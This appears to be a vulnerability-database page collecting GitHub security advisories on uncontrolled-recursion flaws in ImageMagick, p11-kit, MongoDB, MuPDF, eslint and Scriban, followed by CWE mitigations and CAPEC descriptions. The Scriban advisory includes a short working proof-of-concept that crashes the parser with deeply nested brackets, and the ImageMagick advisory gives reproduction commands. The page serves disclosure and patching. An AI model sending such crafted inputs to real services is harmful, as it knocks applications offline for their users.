              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68618"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T22:54:32Z",
    "nvd_published_at": "2025-12-30T17:15:43Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nUsing Magick to read a malicious SVG file resulted in a DoS attack.\n\n### Details\n\nbt obtained using gdb:\n\n```\n#4 0x0000555555794c9c in ResizeMagickMemory (memory=0x7fffee203800, size=391344) at MagickCore/memory.c:1443\n#5 0x0000555555794e5a in ResizeQuantumMemory (memory=0x7fffee203800, count=48918, quantum=8) \nat MagickCore/memory.c:1508\n#6 0x0000555555acc8ed in SVGStartElement (context=0x517000000080, name=0x5190000055e3 \"g\", attributes=0x0) \nat coders/svg.c:1254\n#7 0x00007ffff6799b1c in xmlParseStartTag () at /lib/x86_64-linux-gnu/libxml2.so.2\n#8 0x00007ffff68c7bb8 in () at /lib/x86_64-linux-gnu/libxml2.so.2\n#9 0x00007ffff67a03f1 in xmlParseChunk () at /lib/x86_64-linux-gnu/libxml2.so.2\n```\n\nThis is related to the SVGStartElement and ResizeQuantumMemory functions.\n\n### PoC\n\n1. Generate an SVG file\n\n2. Read this file using Magick:\n\n```\n./magick /data/ylwang/Tools/LargeScan/targets/ImageMagick/test++/1.svg null\n```\n\n3. Causes a DoS Attack\n\nMy server has a large amount of memory, causing a stack overflow to take a long time. I\u0027ll use the Windows release version as an example:\n\n``` \nPS C:\\Program Files\\ImageMagick-7.1.2-Q8\u003e .\\magick.exe -ping 1.svg null:\nPS C:\\Program Files\\ImageMagick-7.1.2-Q8\u003e echo $LASTEXITCODE\n-1073741571\n```\n\nThe error code -1073741571 indicates a crash due to a stack overflow.\n\n### Impact\n\nThis is a DoS vulnerability and all applications using Magick to parse SVG files are affected.",
  "id": "GHSA-p27m-hp98-6637",
  "modified": "2025-12-30T22:54:33Z",
  "published": "2025-12-30T22:54:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68618"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ImageMagick/ImageMagick"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ImageMagick\u0027s failure to limit the depth of SVG file reads caused a DoS attack"
}

GHSA-P2WM-69QX-X25W

Vulnerability from github – Published: 2026-06-29 21:32 – Updated: 2026-07-13 06:31
VLAI
Details

A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-13757"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-29T19:16:40Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.",
  "id": "GHSA-p2wm-69qx-x25w",
  "modified": "2026-07-13T06:31:30Z",
  "published": "2026-06-29T21:32:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13757"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37469"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:38342"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-13757"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494556"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-p2wm-69qx-x25w"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P332-57GQ-W6HX

Vulnerability from github – Published: 2025-06-26 18:31 – Updated: 2025-06-26 18:31
VLAI
Details

MongoDB Server may be susceptible to stack overflow due to JSON parsing mechanism, where specifically crafted JSON inputs may induce unwarranted levels of recursion, resulting in excessive stack space consumption. Such inputs can lead to a stack overflow that causes the server to crash which could occur pre-authorisation. This issue affects MongoDB Server v7.0 versions prior to 7.0.17 and MongoDB Server v8.0 versions prior to 8.0.5.

The same issue affects MongoDB Server v6.0 versions prior to 6.0.21, but an attacker can only induce denial of service after authenticating.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6710"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-26T14:15:35Z",
    "severity": "HIGH"
  },
  "details": "MongoDB Server may be susceptible to stack overflow due to JSON parsing mechanism, where specifically crafted JSON inputs may induce unwarranted levels of recursion, resulting in excessive stack space consumption. Such inputs can lead to a stack overflow that causes the server to crash which could occur pre-authorisation. This issue affects MongoDB Server v7.0 versions prior to 7.0.17 and MongoDB Server v8.0 versions prior to 8.0.5.\n\nThe same issue affects MongoDB Server v6.0 versions prior to 6.0.21, but an attacker can only induce denial of service after authenticating.",
  "id": "GHSA-p332-57gq-w6hx",
  "modified": "2025-06-26T18:31:27Z",
  "published": "2025-06-26T18:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6710"
    },
    {
      "type": "WEB",
      "url": "https://jira.mongodb.org/browse/SERVER-106749"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P4V2-J6V4-FJV7

Vulnerability from github – Published: 2022-05-13 01:22 – Updated: 2024-09-11 18:30
VLAI
Details

svg-run.c in Artifex MuPDF 1.14.0 has infinite recursion with stack consumption in svg_run_use_symbol, svg_run_element, and svg_run_use, as demonstrated by mutool.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-6131"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-01-11T05:29:00Z",
    "severity": "MODERATE"
  },
  "details": "svg-run.c in Artifex MuPDF 1.14.0 has infinite recursion with stack consumption in svg_run_use_symbol, svg_run_element, and svg_run_use, as demonstrated by mutool.",
  "id": "GHSA-p4v2-j6v4-fjv7",
  "modified": "2024-09-11T18:30:58Z",
  "published": "2022-05-13T01:22:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6131"
    },
    {
      "type": "WEB",
      "url": "https://bugs.ghostscript.com/show_bug.cgi?id=700442"
    },
    {
      "type": "WEB",
      "url": "https://cgit.ghostscript.com/cgi-bin/cgit.cgi/mupdf.git/commit/?id=c8f7e48ff74720a5e984ae19d978a5ab4d5dde5b"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CNJNEX5EW6YH5OARXXSSXW4HHC5PIBSY"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SEK2EHVNREJ7XZMFF2MXRWKIF4IBHPNE"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CNJNEX5EW6YH5OARXXSSXW4HHC5PIBSY"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SEK2EHVNREJ7XZMFF2MXRWKIF4IBHPNE"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/106558"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P5WG-G6QR-C7CG

Vulnerability from github – Published: 2026-01-26 18:31 – Updated: 2026-02-03 17:43
VLAI
Summary
Withdrawn Advisory: eslint has a Stack Overflow when serializing objects with circular references
Details

Withdrawn Advisory

This advisory has been withdrawn because RuleTester is used for testing rules during development and results in a error rather than crashing the application.

Original Description

There is a Stack Overflow vulnerability in eslint before 9.26.0 when serializing objects with circular references in eslint/lib/shared/serialization.js. The exploit is triggered via the RuleTester.run() method, which validates test cases and checks for duplicates. During validation, the internal function checkDuplicateTestCase() is called, which in turn uses the isSerializable() function for serialization checks. When a circular reference object is passed in, isSerializable() enters infinite recursion, ultimately causing a Stack Overflow.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "eslint"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-50537"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-29T14:58:17Z",
    "nvd_published_at": "2026-01-26T16:15:58Z",
    "severity": "MODERATE"
  },
  "details": "## Withdrawn Advisory\nThis advisory has been withdrawn because RuleTester is used for testing rules during development and results in a error rather than crashing the application.\n\n## Original Description\n\nThere is a Stack Overflow vulnerability in eslint before 9.26.0 when serializing objects with circular references in `eslint/lib/shared/serialization.js`. The exploit is triggered via the `RuleTester.run()` method, which validates test cases and checks for duplicates. During validation, the internal function `checkDuplicateTestCase()` is called, which in turn uses the `isSerializable()` function for serialization checks. When a circular reference object is passed in, `isSerializable()` enters infinite recursion, ultimately causing a Stack Overflow.",
  "id": "GHSA-p5wg-g6qr-c7cg",
  "modified": "2026-02-03T17:43:56Z",
  "published": "2026-01-26T18:31:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50537"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eslint/eslint/issues/19646"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eslint/eslint/commit/d683aebc8e0792e4f80bd1488c705c90f22c317e"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/lyyffee/2ee1815e5c2da82c05e9838b9bfefbbc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/eslint/eslint"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Withdrawn Advisory: eslint has a Stack Overflow when serializing objects with circular references",
  "withdrawn": "2026-02-03T17:43:56Z"
}

GHSA-P6Q4-FGR8-VX4P

Vulnerability from github – Published: 2026-03-24 22:06 – Updated: 2026-07-06 13:07
VLAI
Summary
Scriban has a Stack Overflow via Nested Array Initializers That Bypass the ExpressionDepthLimit Fix
Details

Summary

StackOverflowException via nested array initializers bypasses ExpressionDepthLimit fix (GHSA-wgh7-7m3c-fx25)

Details

The recent fix for GHSA-wgh7-7m3c-fx25 (uncontrolled recursion in parser) added ExpressionDepthLimit defaulting to 250. However, deeply nested array initializers ([[[[...) recurse through ParseArrayInitializerParseExpressionParseArrayInitializer, which is a different recursion path not covered by the expression depth counter.

This causes a StackOverflowException on current main (commit b5ac4bf - "Add limits for default safety").

PoC

using Scriban;

// ExpressionDepthLimit (default 250) does NOT prevent this crash
string nested = "{{ " + new string('[', 5000) + "1" + new string(']', 5000) + " }}";
Template.Parse(nested); // StackOverflowException - process terminates

Impact

Same as GHSA-wgh7-7m3c-fx25: High severity. StackOverflowException cannot be caught with try/catch in .NET - the process terminates immediately. Any application calling Template.Parse with untrusted input is vulnerable, even with the new default ExpressionDepthLimit enabled.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Scriban"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Scriban.Signed"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T22:06:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nStackOverflowException via nested array initializers bypasses ExpressionDepthLimit fix (GHSA-wgh7-7m3c-fx25)\n\n### Details\nThe recent fix for GHSA-wgh7-7m3c-fx25 (uncontrolled recursion in parser) added `ExpressionDepthLimit` defaulting to 250. However, deeply nested **array initializers** (`[[[[...`) recurse through `ParseArrayInitializer` \u2192 `ParseExpression` \u2192 `ParseArrayInitializer`, which is a **different recursion path** not covered by the expression depth counter.\n\nThis causes a `StackOverflowException` on current main (commit b5ac4bf - \"Add limits for default safety\").\n\n### PoC\n```\nusing Scriban;\n\n// ExpressionDepthLimit (default 250) does NOT prevent this crash\nstring nested = \"{{ \" + new string(\u0027[\u0027, 5000) + \"1\" + new string(\u0027]\u0027, 5000) + \" }}\";\nTemplate.Parse(nested); // StackOverflowException - process terminates\n```\n\n### Impact\nSame as GHSA-wgh7-7m3c-fx25: High severity. StackOverflowException cannot be caught with try/catch in .NET - the process terminates immediately. Any application calling Template.Parse with untrusted input is vulnerable, even with the new default ExpressionDepthLimit enabled.",
  "id": "GHSA-p6q4-fgr8-vx4p",
  "modified": "2026-07-06T13:07:26Z",
  "published": "2026-03-24T22:06:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/scriban/scriban/security/advisories/GHSA-p6q4-fgr8-vx4p"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-wgh7-7m3c-fx25"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/scriban/scriban"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Scriban has a Stack Overflow via Nested Array Initializers That Bypass the ExpressionDepthLimit Fix"
}

Mitigation
Implementation

Ensure that an end condition will be reached under all logic conditions. The end condition may include checking against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.

Mitigation
Implementation

Increase the stack size.

CAPEC-230: Serialized Data with Nested Payloads

Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.

CAPEC-231: Oversized Serialized Data Payloads

An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.